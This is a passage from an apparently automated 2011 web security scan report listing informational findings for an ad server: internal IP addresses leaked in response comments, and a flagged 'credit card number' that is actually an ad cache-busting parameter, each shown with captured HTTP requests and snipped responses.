The following RFC 1918 IP address was disclosed in the response:

10.62.254.36

Request

Response

22.126. http://www35.glam.com/gad/glamadapt_jsrv.act previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www35.glam.com
Path:	/gad/glamadapt_jsrv.act

Issue detail

The following RFC 1918 IP address was disclosed in the response:

172.30.0.68

Request

GET /gad/glamadapt_jsrv.act?;flg=64;;zone=/;nt=b;cc=us;aft=p;ec=ron;p=0;p=1;!c=nae;!c=s;!c=sf;al=walmartdv;ec=tsp;ia=mf;jpbrash=admax;pec=sp;psh=y;rmt=exp;vec=sp;vpec=sp;ct=pacsun;ct=xboxk3905;qc=D;qc=T;qc=5150;qc=3726;qc=2951;qc=2705;qc=2698;qc=2695;qc=2693;qc=2692;qc=2690;qc=1771;atf=0;pfl=3;dt=s;!c=hagl;!c=hagn;pt=0;afid=1000212071;dsid=864279;pt=sk;gsz=888x11:999,160x600:1;uv=10;;tt=j;u=b0011468bes1sscjtvi,f0f02sa,g10001s;sz=160x600,120x600;tile=1;ord=6583043232094496;;afid=1000212071;dsid=864279;url=002479;seq=1;ux=f-f02sa,tid-1,pid-468bes1sscjtvi,aid-1,g-64,1,;_glt=300:1:6:14:17:431:2011:6:13;a_tz=-300;_g_cv=2; HTTP/1.1
Host: www35.glam.com
Proxy-Connection: keep-alive
Referer: http://fansided.com/category/nba/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: glam_sid=115232130551023312111; ctags=%3bct%3dpacsun%3bct%3dxboxk3905; bkpix2=1; qcsegs=D,T,5150,3726,2951,2705,2698,2695,2693,2692,2690,1771

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: application/x-javascript
ETag: "d398cadfb255eaeb5658516ed12d9db3:1307759730"
X-Glam-Bdata: XGlamBData,nbt,ls,rs
X-Glam-AdId: 5000036879
X-Glam-Euid: 701ae041616bed1e532882927ec42ed0
X-Powered-By: GlamAdapt/ASE/1.5
Vary: Accept-Encoding
Expires: Mon, 13 Jun 2011 11:14:18 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 13 Jun 2011 11:14:18 GMT
Content-Length: 5187
Connection: close

...[SNIP]...
'511');

GlamAdaptSetInfo('region_code', 'DC');

GlamAdaptSetInfo('areacode', '202 703 301');

GlamAdaptSetInfo('city', 'WASHINGTON');

GlamAdaptSetInfo('bw', '5000');

/* Served by [rsapp63/172.30.0.68] for [www30a2.glam.com] at [Mon Jun 13 2011 4:14:18 PDT] */

document.write('
...[SNIP]...

22.127. http://www35.glam.com/gad/glamadapt_jsrv.act previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www35.glam.com
Path:	/gad/glamadapt_jsrv.act

Issue detail

The following RFC 1918 IP address was disclosed in the response:

172.30.0.66

Request

GET /gad/glamadapt_jsrv.act?;flg=64;;zone=/;nt=b;cc=us;aft=p;ec=ron;p=0;p=1;!c=nae;!c=s;!c=sf;al=walmartdv;ec=tsp;ia=mf;jpbrash=admax;pec=sp;psh=y;rmt=exp;vec=sp;vpec=sp;ct=pacsun;ct=xboxk3905;qc=D;qc=T;qc=5150;qc=3726;qc=2951;qc=2705;qc=2698;qc=2695;qc=2693;qc=2692;qc=2690;qc=1771;atf=0;pfl=3;dt=s;!c=hagl;!c=hagn;pt=0;afid=1000212071;dsid=864279;uv=10;;tt=j;u=b0033fawbst1ssbzd4i,f0f02sa,g10001s;sz=728x90;tile=3;ord=4876240110024810;;afid=1000212071;dsid=864279;url=txanco;seq=1;ux=f-f02sa,tid-3,pid-fawbst1ssbzd4i,aid-3,g-64,1,;_glt=300:1:6:3:12:38:2011:6:13;a_tz=-300;_g_cv=2; HTTP/1.1
Host: www35.glam.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/2011/06/13/10-observations-dallas-mavs-finals/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: glam_sid=115232130551023312111; ctags=%3bct%3dpacsun%3bct%3dxboxk3905; bkpix2=1; qcsegs=D,T,5150,3726,2951,2705,2698,2695,2693,2692,2690,1771

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: application/x-javascript
ETag: "d398cadfb255eaeb5658516ed12d9db3:1307759730"
X-Glam-Bdata: XGlamBData,nbt,ls,rs
X-Glam-AdId: 5000042624
X-Glam-Euid: adf7d753c2cad14637ca99c7d3d008a2
X-Powered-By: GlamAdapt/ASE/1.5
Vary: Accept-Encoding
Expires: Mon, 13 Jun 2011 11:03:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 13 Jun 2011 11:03:12 GMT
Content-Length: 3567
Connection: close

...[SNIP]...
'511');

GlamAdaptSetInfo('region_code', 'DC');

GlamAdaptSetInfo('areacode', '202 703 301');

GlamAdaptSetInfo('city', 'WASHINGTON');

GlamAdaptSetInfo('bw', '5000');

/* Served by [rsapp61/172.30.0.66] for [www30a2.glam.com] at [Mon Jun 13 2011 4:03:12 PDT] */

document.write('<script type=\"text/javascript\" src=\"http://altfarm.mediaplex.com/ad/js/17038-128465-20406-11?mpt=4df5ee708d29c&mpvc=htt
...[SNIP]...

22.128. http://www35.glam.com/gad/glamadapt_jsrv.act previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www35.glam.com
Path:	/gad/glamadapt_jsrv.act

Issue detail

The following RFC 1918 IP address was disclosed in the response:

172.30.0.43

Request

GET /gad/glamadapt_jsrv.act?;flg=64;;zone=/;nt=b;cc=us;aft=p;ec=ron;p=0;p=1;!c=nae;!c=s;!c=sf;al=walmartdv;ec=tsp;ia=mf;jpbrash=admax;pec=sp;psh=y;rmt=exp;vec=sp;vpec=sp;ct=pacsun;ct=xboxk3905;atf=0;pfl=3;dt=s;!c=hagl;!c=hagn;pt=0;afid=1000212071;dsid=864279;pt=sk;gsz=888x11:999,300x250:1;uv=10;;tt=j;u=b0021fawbst1ssbzd4i,f0f02sa,g10001s;sz=300x250;tile=1;ord=4876240110024810;;afid=1000212071;dsid=864279;url=txanco;seq=1;ux=f-f02sa,tid-1,pid-fawbst1ssbzd4i,aid-2,g-64,1,;_glt=300:1:6:2:1:979:2011:6:13;a_tz=-300;_g_cv=2; HTTP/1.1
Host: www35.glam.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/2011/06/13/10-observations-dallas-mavs-finals/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: glam_sid=115232130551023312111; ctags=%3bct%3dpacsun%3bct%3dxboxk3905; bkpix2=1

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: application/x-javascript
ETag: "d398cadfb255eaeb5658516ed12d9db3:1307759730"
X-Glam-Bdata: XGlamBData,nbt,ls,rs
X-Glam-AdId: 5000042623
X-Glam-Euid: a298fe713aedd0d6f764b756be34a6a0
X-Powered-By: GlamAdapt/ASE/1.5
Vary: Accept-Encoding
Expires: Mon, 13 Jun 2011 11:02:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 13 Jun 2011 11:02:03 GMT
Content-Length: 3710
Connection: close

...[SNIP]...
'511');

GlamAdaptSetInfo('region_code', 'DC');

GlamAdaptSetInfo('areacode', '202 703 301');

GlamAdaptSetInfo('city', 'WASHINGTON');

GlamAdaptSetInfo('bw', '5000');

/* Served by [rsapp38/172.30.0.43] for [www30a2.glam.com] at [Mon Jun 13 2011 4:02:03 PDT] */

document.write(' <img src=\"http://amch.questionmarket.com/adsc/d724925/2/725047/adscout.php?ord=4df5ee2bcc2b2\" height=\"0\" width=\"0\"
...[SNIP]...

22.129. http://www35.glam.com/gad/glamadapt_jsrv.act previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www35.glam.com
Path:	/gad/glamadapt_jsrv.act

Issue detail

The following RFC 1918 IP address was disclosed in the response:

172.30.0.162

Request

GET /gad/glamadapt_jsrv.act?;flg=64;;zone=/;nt=b;cc=us;aft=p;ec=ron;p=0;p=1;!c=nae;!c=s;!c=sf;al=walmartdv;ec=tsp;ia=mf;jpbrash=admax;pec=sp;psh=y;rmt=exp;vec=sp;vpec=sp;ct=pacsun;ct=xboxk3905;qc=D;qc=T;qc=5150;qc=3726;qc=2951;qc=2705;qc=2698;qc=2695;qc=2693;qc=2692;qc=2690;qc=1771;atf=0;pfl=3;dt=s;!c=hagl;!c=hagn;pt=0;afid=1000212071;dsid=864279;uv=10;;tt=j;u=b0032g2reou1ssci1k9,f0f02sa,g10001s;sz=728x90;tile=2;ord=4654773336369544;;afid=1000212071;dsid=864279;url=00l3it;seq=1;ux=f-f02sa,tid-2,pid-g2reou1ssci1k9,aid-3,g-64,1,;_glt=300:1:6:13:24:116:2011:6:13;a_tz=-300;_g_cv=2; HTTP/1.1
Host: www35.glam.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/aboutcontact-us/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: glam_sid=115232130551023312111; ctags=%3bct%3dpacsun%3bct%3dxboxk3905; bkpix2=1; qcsegs=D,T,5150,3726,2951,2705,2698,2695,2693,2692,2690,1771

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: application/x-javascript
ETag: "d398cadfb255eaeb5658516ed12d9db3:1307759730"
X-Glam-Bdata: XGlamBData,nbt,ls,rs
X-Glam-AdId: 5000042624
X-Glam-Euid: 7d90fa6f3101c8fade5f2bf750f33a43
X-Powered-By: GlamAdapt/ASE/1.5
Vary: Accept-Encoding
Expires: Mon, 13 Jun 2011 11:13:24 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 13 Jun 2011 11:13:24 GMT
Content-Length: 3571
Connection: close

...[SNIP]...
'511');

GlamAdaptSetInfo('region_code', 'DC');

GlamAdaptSetInfo('areacode', '202 703 301');

GlamAdaptSetInfo('city', 'WASHINGTON');

GlamAdaptSetInfo('bw', '5000');

/* Served by [rsapp122/172.30.0.162] for [www30a2.glam.com] at [Mon Jun 13 2011 4:13:24 PDT] */

document.write('<script type=\"text/javascript\" src=\"http://altfarm.mediaplex.com/ad/js/17038-128465-20406-11?mpt=4df5f0d4b6b72&mpvc=htt
...[SNIP]...

22.130. http://www35.glam.com/gad/glamadapt_jsrv.act previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www35.glam.com
Path:	/gad/glamadapt_jsrv.act

Issue detail

The following RFC 1918 IP address was disclosed in the response:

172.30.0.116

Request

GET /gad/glamadapt_jsrv.act?;flg=64;;zone=/;nt=b;cc=us;aft=p;ec=ron;p=0;p=1;!c=nae;!c=s;!c=sf;al=walmartdv;ec=tsp;ia=mf;jpbrash=admax;pec=sp;psh=y;rmt=exp;vec=sp;vpec=sp;ct=pacsun;ct=xboxk3905;qc=D;qc=T;qc=5150;qc=3726;qc=2951;qc=2705;qc=2698;qc=2695;qc=2693;qc=2692;qc=2690;qc=1771;atf=0;pfl=3;dt=s;!c=hagl;!c=hagn;pt=0;afid=1000212071;dsid=864279;uv=10;;tt=j;u=b0012fawbst1ssbzd4i,f0f02sa,g10001s;sz=160x600,120x600;tile=2;ord=4876240110024810;;afid=1000212071;dsid=864279;url=txanco;seq=1;ux=f-f02sa,tid-2,pid-fawbst1ssbzd4i,aid-1,g-64,1,;_glt=300:1:6:2:53:580:2011:6:13;a_tz=-300;_g_cv=2; HTTP/1.1
Host: www35.glam.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/2011/06/13/10-observations-dallas-mavs-finals/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: glam_sid=115232130551023312111; ctags=%3bct%3dpacsun%3bct%3dxboxk3905; bkpix2=1; qcsegs=D,T,5150,3726,2951,2705,2698,2695,2693,2692,2690,1771

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: application/x-javascript
ETag: "d398cadfb255eaeb5658516ed12d9db3:1307759730"
X-Glam-Bdata: XGlamBData,nbt,ls,rs
X-Glam-AdId: 5000036879
X-Glam-Euid: 4e601faf039d7bb33507015141dc9237
X-Powered-By: GlamAdapt/ASE/1.5
Vary: Accept-Encoding
Expires: Mon, 13 Jun 2011 11:03:01 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 13 Jun 2011 11:03:01 GMT
Content-Length: 5020
Connection: close

...[SNIP]...
'511');

GlamAdaptSetInfo('region_code', 'DC');

GlamAdaptSetInfo('areacode', '202 703 301');

GlamAdaptSetInfo('city', 'WASHINGTON');

GlamAdaptSetInfo('bw', '5000');

/* Served by [rsapp107/172.30.0.116] for [www30a2.glam.com] at [Mon Jun 13 2011 4:03:01 PDT] */

document.write('<IFRAME SRC=\"http://ad.doubleclick.net/adi/N553.Glam/B5345813.2;sz=160x600;pc=[TPAS_ID];click=http://www30a2.glam.com/gad
...[SNIP]...

22.131. http://www35.glam.com/gad/glamadapt_jsrv.act previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www35.glam.com
Path:	/gad/glamadapt_jsrv.act

Issue detail

The following RFC 1918 IP address was disclosed in the response:

172.30.0.57

Request

GET /gad/glamadapt_jsrv.act?;flg=64;;zone=/;nt=b;cc=us;aft=p;ec=ron;p=0;p=1;!c=nae;!c=s;!c=sf;al=walmartdv;ec=tsp;ia=mf;jpbrash=admax;pec=sp;psh=y;rmt=exp;vec=sp;vpec=sp;ct=pacsun;ct=xboxk3905;qc=D;qc=T;qc=5150;qc=3726;qc=2951;qc=2705;qc=2698;qc=2695;qc=2693;qc=2692;qc=2690;qc=1771;atf=0;pfl=3;dt=s;!c=hagl;!c=hagn;pt=0;afid=1000212071;dsid=864279;uv=10;;tt=j;u=b0032y5ic8r1sscit6r,f0f02sa,g10001s;sz=728x90;tile=2;ord=2206037009600550;;afid=1000212071;dsid=864279;url=19ug13;seq=1;ux=f-f02sa,tid-2,pid-y5ic8r1sscit6r,aid-3,g-64,1,;_glt=300:1:6:13:55:402:2011:6:13;a_tz=-300;_g_cv=2; HTTP/1.1
Host: www35.glam.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/z-the-fort-worth-four/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: glam_sid=115232130551023312111; ctags=%3bct%3dpacsun%3bct%3dxboxk3905; bkpix2=1; qcsegs=D,T,5150,3726,2951,2705,2698,2695,2693,2692,2690,1771

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: application/x-javascript
ETag: "d398cadfb255eaeb5658516ed12d9db3:1307759730"
X-Glam-Bdata: XGlamBData,nbt,ls,rs
X-Glam-AdId: 5000044847
X-Glam-Euid: 72ae7c970a4e7f718295179443953301
X-Powered-By: GlamAdapt/ASE/1.5
Vary: Accept-Encoding
Expires: Mon, 13 Jun 2011 11:13:55 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 13 Jun 2011 11:13:55 GMT
Content-Length: 3388
Connection: close

...[SNIP]...
'511');

GlamAdaptSetInfo('region_code', 'DC');

GlamAdaptSetInfo('areacode', '202 703 301');

GlamAdaptSetInfo('city', 'WASHINGTON');

GlamAdaptSetInfo('bw', '5000');

/* Served by [rsapp52/172.30.0.57] for [www30a2.glam.com] at [Mon Jun 13 2011 4:13:55 PDT] */

document.write('<SCRIPT language=\'JavaScript1.1\' SRC=\"http://ad.doubleclick.net/adj/N6294.149112.GLAMMEDIA.COM/B5303021.4;sz=728x90;cli
...[SNIP]...

22.132. http://www35.glam.com/gad/glamadapt_jsrv.act previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www35.glam.com
Path:	/gad/glamadapt_jsrv.act

Issue detail

The following RFC 1918 IP address was disclosed in the response:

172.30.0.109

Request

GET /gad/glamadapt_jsrv.act?;flg=64;;zone=/;nt=b;cc=us;aft=p;ec=ron;p=0;p=1;!c=nae;!c=s;!c=sf;al=walmartdv;ec=tsp;ia=mf;jpbrash=admax;pec=sp;psh=y;rmt=exp;vec=sp;vpec=sp;ct=pacsun;ct=xboxk3905;atf=0;pfl=3;dt=s;!c=hagl;!c=hagn;pt=0;afid=1000212071;dsid=864279;pt=sk;gsz=888x11:999,300x250:1;uv=10;;tt=j;u=b0021fawbst1ssbzd4i,f0f02sa,g10001s;sz=300x250;tile=1;ord=4876240110024810;;afid=1000212071;dsid=864279;url=txanco;seq=1;ux=f-f02sa,tid-1,pid-fawbst1ssbzd4i,aid-2,g-64,1,;_glt=300:1:6:2:1:979:2011:6:13;a_tz=-300;_g_cv=2; HTTP/1.1
Host: www35.glam.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/2011/06/13/10-observations-dallas-mavs-finals/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: glam_sid=115232130551023312111; ctags=%3bct%3dpacsun%3bct%3dxboxk3905; bkpix2=1

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: application/x-javascript
ETag: "d398cadfb255eaeb5658516ed12d9db3:1307759730"
X-Glam-Bdata: XGlamBData,nbt,ls,rs
X-Glam-AdId: 5000033376
X-Glam-Euid: e8987e6404708b1b0e8fa3e755c88e0e
X-Powered-By: GlamAdapt/ASE/1.5
Vary: Accept-Encoding
Expires: Mon, 13 Jun 2011 11:10:01 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 13 Jun 2011 11:10:01 GMT
Content-Length: 7369
Connection: close

...[SNIP]...
'511');

GlamAdaptSetInfo('region_code', 'DC');

GlamAdaptSetInfo('areacode', '202 703 301');

GlamAdaptSetInfo('city', 'WASHINGTON');

GlamAdaptSetInfo('bw', '5000');

/* Served by [rsapp104/172.30.0.109] for [www30a2.glam.com] at [Mon Jun 13 2011 4:10:01 PDT] */

document.write('
...[SNIP]...

22.133. http://www35.glam.com/gad/glamadapt_jsrv.act previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www35.glam.com
Path:	/gad/glamadapt_jsrv.act

Issue detail

The following RFC 1918 IP address was disclosed in the response:

172.30.0.110

Request

GET /gad/glamadapt_jsrv.act?;flg=64;;zone=/;nt=b;cc=us;aft=p;ec=ron;p=0;p=1;!c=nae;!c=s;!c=sf;al=walmartdv;ec=tsp;ia=mf;jpbrash=admax;pec=sp;psh=y;rmt=exp;vec=sp;vpec=sp;ct=pacsun;ct=xboxk3905;qc=D;qc=T;qc=5150;qc=3726;qc=2951;qc=2705;qc=2698;qc=2695;qc=2693;qc=2692;qc=2690;qc=1771;atf=0;pfl=3;dt=s;!c=hagl;!c=hagn;pt=0;afid=1000212071;dsid=864279;pt=sk;gsz=888x11:999,160x600:1;uv=10;;tt=j;u=b0011g2reou1ssci1k9,f0f02sa,g10001s;sz=160x600,120x600;tile=1;ord=4654773336369544;;afid=1000212071;dsid=864279;url=00l3it;seq=1;ux=f-f02sa,tid-1,pid-g2reou1ssci1k9,aid-1,g-64,1,;_glt=300:1:6:13:13:573:2011:6:13;a_tz=-300;_g_cv=2; HTTP/1.1
Host: www35.glam.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/aboutcontact-us/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: glam_sid=115232130551023312111; ctags=%3bct%3dpacsun%3bct%3dxboxk3905; bkpix2=1; qcsegs=D,T,5150,3726,2951,2705,2698,2695,2693,2692,2690,1771

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: application/x-javascript
ETag: "d398cadfb255eaeb5658516ed12d9db3:1307759730"
X-Glam-Bdata: XGlamBData,nbt,ls,rs
X-Glam-AdId: 5000036879
X-Glam-Euid: 09bdd73895bd3803918767154e79d853
X-Powered-By: GlamAdapt/ASE/1.5
Vary: Accept-Encoding
Expires: Mon, 13 Jun 2011 11:13:14 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 13 Jun 2011 11:13:14 GMT
Content-Length: 5753
Connection: close

...[SNIP]...
'511');

GlamAdaptSetInfo('region_code', 'DC');

GlamAdaptSetInfo('areacode', '202 703 301');

GlamAdaptSetInfo('city', 'WASHINGTON');

GlamAdaptSetInfo('bw', '5000');

/* Served by [rsapp105/172.30.0.110] for [www30a2.glam.com] at [Mon Jun 13 2011 4:13:14 PDT] */
var glam_urldata_set='http://glam.grapeshot.co.uk/main/redirect.cgi?url=' +
encodeURIComponent(window.location) +

...[SNIP]...

22.134. http://www35.glam.com/gad/glamadapt_jsrv.act previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www35.glam.com
Path:	/gad/glamadapt_jsrv.act

Issue detail

The following RFC 1918 IP address was disclosed in the response:

172.30.0.62

Request

GET /gad/glamadapt_jsrv.act?;flg=64;;zone=/;nt=b;cc=us;aft=p;ec=ron;p=0;p=1;!c=nae;!c=s;!c=sf;al=walmartdv;ec=tsp;ia=mf;jpbrash=admax;pec=sp;psh=y;rmt=exp;vec=sp;vpec=sp;ct=pacsun;ct=xboxk3905;qc=D;qc=T;qc=5150;qc=3726;qc=2951;qc=2705;qc=2698;qc=2695;qc=2693;qc=2692;qc=2690;qc=1771;atf=0;pfl=3;dt=s;!c=hagl;!c=hagn;pt=0;afid=1000212071;dsid=864279;uv=10;;tt=j;u=b0012fawbst1ssbzd4i,f0f02sa,g10001s;sz=160x600,120x600;tile=2;ord=4876240110024810;;afid=1000212071;dsid=864279;url=txanco;seq=1;ux=f-f02sa,tid-2,pid-fawbst1ssbzd4i,aid-1,g-64,1,;_glt=300:1:6:2:53:580:2011:6:13;a_tz=-300;_g_cv=2; HTTP/1.1
Host: www35.glam.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/2011/06/13/10-observations-dallas-mavs-finals/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: glam_sid=115232130551023312111; ctags=%3bct%3dpacsun%3bct%3dxboxk3905; bkpix2=1; qcsegs=D,T,5150,3726,2951,2705,2698,2695,2693,2692,2690,1771

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: application/x-javascript
ETag: "d398cadfb255eaeb5658516ed12d9db3:1307759730"
X-Glam-Bdata: XGlamBData,nbt,ls,rs
X-Glam-AdId: 5000045036
X-Glam-Euid: efd00282fdbdb1167c2fb7db0eed0702
X-Powered-By: GlamAdapt/ASE/1.5
Vary: Accept-Encoding
Expires: Mon, 13 Jun 2011 11:19:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 13 Jun 2011 11:19:10 GMT
Content-Length: 3208
Connection: close

...[SNIP]...
'511');

GlamAdaptSetInfo('region_code', 'DC');

GlamAdaptSetInfo('areacode', '202 703 301');

GlamAdaptSetInfo('city', 'WASHINGTON');

GlamAdaptSetInfo('bw', '5000');

/* Served by [rsapp57/172.30.0.62] for [www30a2.glam.com] at [Mon Jun 13 2011 4:19:10 PDT] */

document.write('<div>
...[SNIP]...

23. Credit card numbers disclosed previous next
There are 2 instances of this issue:

http://img.mediaplex.com/content/0/17038/128465/Roxy_728x90_Female_Butt.js
http://www35.glam.com/gad/glamadapt_jsrv.act

Issue background

Responses containing credit card numbers may not represent any security vulnerability - for example, a number may belong to the logged-in user to whom it is displayed. You should verify whether the numbers identified are actually valid credit card numbers and whether their disclosure within the application is appropriate.

23.1. http://img.mediaplex.com/content/0/17038/128465/Roxy_728x90_Female_Butt.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/17038/128465/Roxy_728x90_Female_Butt.js

Issue detail

The following credit card number was disclosed in the response:

4654773336369544

Request

GET /content/0/17038/128465/Roxy_728x90_Female_Butt.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F17038-128465-20406-11%3Fmpt%3D4df5f0d4b6b72&mpt=4df5f0d4b6b72&mpvc=http://www30a2.glam.com/gad/click.act?0339-_gclickid=gaclk4df5f0d4b7ef9-_advid=50002325-_adid=5000042624-_crid=500030953-_aipid=201106130402-_ge_=1^2^7d90fa6f3101c8fade5f2bf750f33a43-ord=4654773336369544-afid=1000212071-dsid=864279-sz=728x90-zone=/-sid=115232130551023312111-tile=2-seq=1-tt=j-atf=0-url=00l3it-flg=64-u=b0032g2reou1ssci1k9,f0f02sa,g10001s-_gclick_gaclk4df5f0d4b7ef9 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/aboutcontact-us/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=173274949960; mojo1=s/137381247401/80; mojo2=14302:16279/13198:5934; mojo3=17038:20406/12309:23636/9966:1105/17550:1884/15017:13113/14302:40017/1551:9866/9700:21584/10759:1104/12124:36735/14855:1178/10433:17922/13198:5934/9608:1178/14207:2056/13754:29158

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:21:32 GMT
Server: Apache
Last-Modified: Mon, 09 May 2011 15:07:25 GMT
ETag: "525a29-f07-4a2d932756540"
Accept-Ranges: bytes
Content-Length: 9664
Content-Type: application/x-javascript

function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";

if( navigator.mimeTypes && navigator.mimeTypes["application/x-shockwave-flash"] && navigator.mimeTypes["application/x-shockwave-flash"].
...[SNIP]...
UE=\"clickTAG=http://www30a2.glam.com/gad/click.act?0339-_gclickid=gaclk4df5f0d4b7ef9-_advid=50002325-_adid=5000042624-_crid=500030953-_aipid=201106130402-_ge_=1^2^7d90fa6f3101c8fade5f2bf750f33a43-ord=4654773336369544-afid=1000212071-dsid=864279-sz=728x90-zone=/-sid=115232130551023312111-tile=2-seq=1-tt=j-atf=0-url=00l3it-flg=64-u=b0032g2reou1ssci1k9,f0f02sa,g10001s-_gclick_gaclk4df5f0d4b7ef9http://altfarm.mediaple
...[SNIP]...
6b72&clickTag=http://www30a2.glam.com/gad/click.act?0339-_gclickid=gaclk4df5f0d4b7ef9-_advid=50002325-_adid=5000042624-_crid=500030953-_aipid=201106130402-_ge_=1^2^7d90fa6f3101c8fade5f2bf750f33a43-ord=4654773336369544-afid=1000212071-dsid=864279-sz=728x90-zone=/-sid=115232130551023312111-tile=2-seq=1-tt=j-atf=0-url=00l3it-flg=64-u=b0032g2reou1ssci1k9,f0f02sa,g10001s-_gclick_gaclk4df5f0d4b7ef9http://altfarm.mediaple
...[SNIP]...
b72&clickTag1=http://www30a2.glam.com/gad/click.act?0339-_gclickid=gaclk4df5f0d4b7ef9-_advid=50002325-_adid=5000042624-_crid=500030953-_aipid=201106130402-_ge_=1^2^7d90fa6f3101c8fade5f2bf750f33a43-ord=4654773336369544-afid=1000212071-dsid=864279-sz=728x90-zone=/-sid=115232130551023312111-tile=2-seq=1-tt=j-atf=0-url=00l3it-flg=64-u=b0032g2reou1ssci1k9,f0f02sa,g10001s-_gclick_gaclk4df5f0d4b7ef9http://altfarm.mediaple
...[SNIP]...
